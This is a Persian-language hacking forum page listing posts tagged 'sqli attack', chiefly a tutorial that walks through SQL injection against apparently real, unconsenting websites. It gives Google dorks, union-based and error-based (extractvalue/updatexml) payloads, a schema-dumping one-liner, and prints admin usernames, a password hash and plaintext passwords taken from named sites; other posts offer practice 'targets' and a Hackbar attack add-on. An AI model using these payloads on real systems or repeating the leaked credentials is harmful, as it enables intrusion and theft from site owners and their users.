جستجو در تالارهای گفتگو
در حال نمایش نتایج برای برچسب های 'sqli attack'.
3 نتیجه پیدا شد
-
sql injection آموزش آسیب پذیری Sql Injection (ویدئویی)
Sadra پاسخی ارسال کرد برای یک موضوع در آموزش های تصویری سایت ها و سرورها و روشهای مقابله
با سلام خدمت دوستان عزیز گارد ایران در این تاپیک برای شما تارگت های مختلف sql injection رو قرار می دم که به صورت ویدئویی هست و ضبط کردم تا بتوانید تمرین کنید لذت ببرید . 😁 لینک کانال برای مشاهده ویدئو ها : [Hidden Content] چند نکته مهم : لطفا اگر دوستی قصد ارسال پست دارد فقط به صورت ویدئویی باشد . تارگت در مورد sql injection باشد و بهتره تارگت با نکته ارائه شود . اسپم ارسال نکنید و اگر سوالی داشتید در بخش سوال و جواب ها بپرسید . و اگر پیشنهاد و یا چیزه دیگه ای بود به صورت خصوصی پیام دهید . (در این جا اسپم ارسال نشود ) تشکر 🙏 .- 45 پاسخ
-
- sql injection vulnerability
- اموزش ویدئویی
-
(و 55 مورد دیگر)
برچسب زده شده با :
- sql injection vulnerability
- اموزش ویدئویی
- vulnerability
- site hacking
- اموزش وب هکینگ
- sql injection method
- sql injection bypass
- sql injection ویدئویی
- sqli attack
- باگ بانتی
- هک
- تارگت های تمرینی
- video
- mysql
- polygon
- دیتابیس هکینگ
- وب هکینگ
- database attack
- سرور هکینگ
- هکر
- bug bounty
- باگ
- تارگت
- sqli
- bug
- web hacking
- bug crowd
- waf
- تزریق sql
- database hacking
- آموزش ویدئویی
- sql
- hack
- mr.msa
- bypass
- firewall
- mssql
- like
- cdn
- waf bypassing
- web application firewall
- cloudflare
- اموزش تست و نفوذ
- تارگت sql injection (تست و نفوذ ویدئویی )
- اسیب پذیری های تحت وب
- اسیب پذیری
- اسیب پذیری های سایت
- join
- اموزش هک
- اسیب پذیری sql injection
- اموزش به صورت ویدئویی
- sqli vulnerability
- website vulnerability
- اموزش هک سایت
- اموزش هک سایت با sqli
- اموزش دسترسی به دیتابیس
- اموزش برداشتن دیتابیس یک سایت
-
••.•´¯`•.•• 🎀 به نام خدا 🎀 ••.•`¯´•.•• با سلام خدمت کاربران محترم انجمن گاردایران تارگت اول برای آموزش -> شما برای پی بردن به وجود باگ SQL از چندین روش میتونید استفاده کنید روش اول بعد از عدد یا حرف میتونید هر یک از این علامت هارو قرار بدین ' یا '' یا \ بعد از قرار دادن هر یک از این علامت ها اگر هر گونه تغییر در سایت شدین احتمال زیاد سایت حاوی باگ هستش حالا عملیات برای سایت های مختلف فرق خواهد کرد که با چه زبانی نوشته شده ما فرض میکنیم با php نوشته شده برای پیدا کردن تارگت شما باید دورک نویسی را بلد باشید , اگر دورک نویسی بلد نباشید احتمال زیاد از تارگت هم خبری نیست من لیستی از دورک هارو واستون قرار میدم DORK.txtهر یک از دورک هارو در گوگل search کنید یادتون باشه اول دورک :inurl قرار بدید باگ SQLinjection نکات زیادی داره که سعی میکنم همه ی نکات را تقریبا خدمتتون عرض کنم ولی فعلا شما باید با نحوه ی کار آشنا بشید خب بریم سراغ تارگت اول [Hidden Content] شما بعد از قرار دادن ' متوجه خواهید شد که سایت حاوی باگ است به همین ترتیب شما میتونید خیلی راحت version و تعداد ستون های سایت رو دربیارید [Hidden Content] order by 99999-- 99999 که مشاهده میکنید یک عدد بزرگ هستش که شما به دلخواه میتونید وارد کنید این بدان معناست که ما با سایت صحبت میکنیم که آیا انقدر تعداد ستون دارد یا خیر ؟ اگر بعد از قرار دادن این عدد بزرگ سایت به طور کامل load شد این بدان معناست که سایت در گفتن حرف صحیح دریغ میکند 😁 پس باید بایپس آن را انجام دهیم بایپس این مورد به این شکل هستش [Hidden Content] order by 99999--+ در این حالت سایت دیگر load نمی شود چون دیگر اینقدر ستون ندارد ما تا جایی عدد 9999 را کم میکنیم که تا صفحه load شود که این بدان معناست تعداد ستون ها 5 عدد است [Hidden Content] order by 5--+ حال با دستور UNION SELECT 1,2,3,4,5 ستون هارو مشخص میکنیم [Hidden Content] union select 1,2,3,4,5--+ بعد از انجام مراحل بالا ستون ها مشخص میشود در صفحه عدد 2 و 3 مشخص شده است ما باید سعی کنیم عددی را انتخاب کنیم که از لحاظ سایز زیادی بزرگ نباشد برای مثال در اینجا عدد 2 دارای سایز بزرگتری نسبت به 3 هستش پس ما شروع به سوال پرسیدن از عدد 3 خواهیم کرد حال سوال پیش میاید چرا 2 را انتخاب نکنیم ؟ چون در استخراج اطلاعات مهم سایت مثلا user va pass به صورت حروف بزرگ نمایش داده میشود که ممکن است این حروف به صورت کوچک وارد سیستم شده اند برای فهمیدن version سایت کافی است شما ()version را به جای عدد 3 قرار دهید این نکته هم خدمتتون عرض کنم اگر جایی با گذاشتن ()version چیزی نمیایش داده نشد آن را بایپس کنید بدین صورت version@@ [Hidden Content] union select 1,2,version(),4,5--+ حال به سراغ بیرون کشید data base سایت خواهیم رفت بدین صورت با دستور [Hidden Content] union select 1,2,group_concat(table_name,0x3c62723e),4,5+from+information_schema.tables+where+table_schema=database()--+ اگر مشاهده کنید admin یک base مهم برای کار ماست آن را یاد داشت میکنیم و به صورت hex شده هم در میاوریم اگر نمیدونید چطور به صورت hex دربیارید چون باید به زبان سایت admin را تبدیل کنید یک برنامه قرار میدم برای راحتی کارتون CharConversion.rarپسورد ---> guardiran.org admin = 0x61646d696e اینو یادتون باشه حتما قبل 61646d696e ---> 0x قرار دهید دستور بدین صورت است [Hidden Content]%20union%20select%201,2,group_concat(column_name,0x3c62723e),4,5+from+information_schema.columns+where+table_name=0x61646d696e--+ بعد از مشخص شدن table های مهم آن ها را در دستور زیر وارد کنید group_concat(user,0x3a,password)+from+ Hex kardim [Hidden Content]%20union%20select%201,2,group_concat(user_id,0x3a,password,0x3c62723e),4,5+from+admin--+ به همین راحتی username : admin password : 25a41cec631264f04815eda23dc6edd9 password : vizag@123 سعی کردم تارگتی رو انتخاب کنم که به راحتی بتونید یاد بگیرید دستورات رو نکته : دستوری رو میتونم یادتون بدم که در خیلی موارد جواب میده و اصلا نیاز نیست زمان زیادی برای پیدا کردن database یا table صرف کنید شما فقط کافی در قسمت ستون آسیب پذیر این دستور رو وارد کنید (select(@)from(select(@:=0x00),(select(@)from(information_schema.columns)where(@)in(@:=concat(@,0x3C62723E,table_name,0x3a,column_name))))a) به همین راحتی تمام جزئیات مشخص خواهد شد تارگت شماره ی 2 ----------> [Hidden Content] شما خیلی راحت میتونید با دورک نویسی صفحه ای رو پیدا کنید برای وارد کرد دستورات مثلا در گوگل بدین صورت search میکنید site:"[Hidden Content]" inurl:"id=" [Hidden Content]/our-products-detail.php?id=1 فرضا این صفحه رو انتخاب کردیم و دستورات را وارد میکنیم با وارد کردن ' متوجه میشیم که سایت دارای تغییر است و Error میدهد پس سایت باگ SQLinjection دارد حال دستورات را وارد میکنیم [Hidden Content]/our-products-detail.php?id=1 order by 999999-- بعد از آن فهمیدیم که تعداد ستون های سایت 7 تا است بدین طریق عمل میکنیم [Hidden Content]/our-products-detail.php?id=1%20union%20select%201,2,3,4,5,6,7-- ولی بعد از وارد کردن این دستورات یک Error معروف به میدهد The used SELECT statements have a different number of columns زمانی که با این Error مواجع شدید باید از بایپس استفاده کنید اگر بایپس هم جوابگو نداد باید از متد Xpath injection استفاده کنید متد xpath injection برای به دست آوردن version در این متد شما باید بدین طریق عمل کنید با این دستور +and+extractvalue(rand(),concat(0x7e,version()))-- or +and+updatexml(null,concat(0x3a,version()),null)-- بعد از وارد کردن [Hidden Content]/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,version()))-- version مشخص میشود XPATH syntax error: '~5.5.62-38.14-log' به همین راحتی حالا باتوجه به دستورات xpath injection برای به دست آوردن data base سایت عمل میکنیم بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))-- که با زیاد کردن عدد 0 میتونید database رامشخص کنید ولی برای راحتی کار شما یک متد محدود سازی شده قرار میدم که میتونید استفاده کنید که زمانتون از دست نره بدین روش +and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- حال دستورات را وارد کنید بدین طریق [Hidden Content]/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1)))-- مشاهده میکنید که با خوش شانسی اول admin پدیدار میشود بسیار خب حال برای فهمیدن چه چیزی درون ادمین است از این روش استفاده میکنیم فقط قبلش باید admin رو به صورت hex شده دربیارید admin = 0x61646d696e +and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=name table hex masalan admin+limit+0,1)))-- بسیار خب حالا دستور بالا را وارد میکنیم www.belbana.com/our-products-detail.php?id=1+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0x61646d696e+limit+0,1)))-- بسیار خب حالا عدد صفر را به ترتیب زیاد کنید مشاهده میکنید که XPATH syntax error: '~id' XPATH syntax error: '~login' XPATH syntax error: '~paswoord' نمایش داده میشود انقدر عدد را افزایش میدید که دیگر چیزی نمایش داده نشود حالا با دستور زیاد اطلاعات رو بیرون میکشیم +and+extractvalue(rand(),concat(0x7e,(select+concat(login,0x7e,paswoord)+from+admin+limit+0,1)))-- XPATH syntax error: '~belbana~3AMGz4dfNRUteaZfbeng' سعی میکنم در روز های آینده تارگت و آموزش رو باهم قرار بدم همراه با بایپس های خاص امیدوارم موفید واقع شده باشه با تشکر
- 1 پاسخ
-
- آموزش sqlinje
- sqlinjectin bypass
- (و 13 مورد دیگر)
-
سلام دوستان. از اونجایی که ظاهرا پیر شدیم تو جوونی گفتیم کار بقیه رو اقلا رو راه بندازیم. اینجا افزونه Hackbar Professional رو براتون پیوست کردم. باید بگم که این افزونه علاوه بر نسخه ی اصلیِ hackbar دارای اضافه هایی هست که توی حملات خیلی بدردتون میخوره. مثلا میتونید لینک رو با انواع bypasser هایی که داره تست کنید و نیازی به تایپ دستی نباشه ولی سعی کنید که کد ها رو حفظ کنید و درک داشته باشید نه اینکه فقط چند تا کلیک کرده باشید. ضمناً این افزونه روی Cyberfox 59 هم نصب میشه. سایبرفاکس رو بگیرید و این افزونه رو روش نصب کنید. رمز عبور : guardiran.org Hackbar Professional Moded by r3yz3 - guardiran.org.rar
-
- hackbar professional
- sqli attack
-
(و 5 مورد دیگر)
برچسب زده شده با :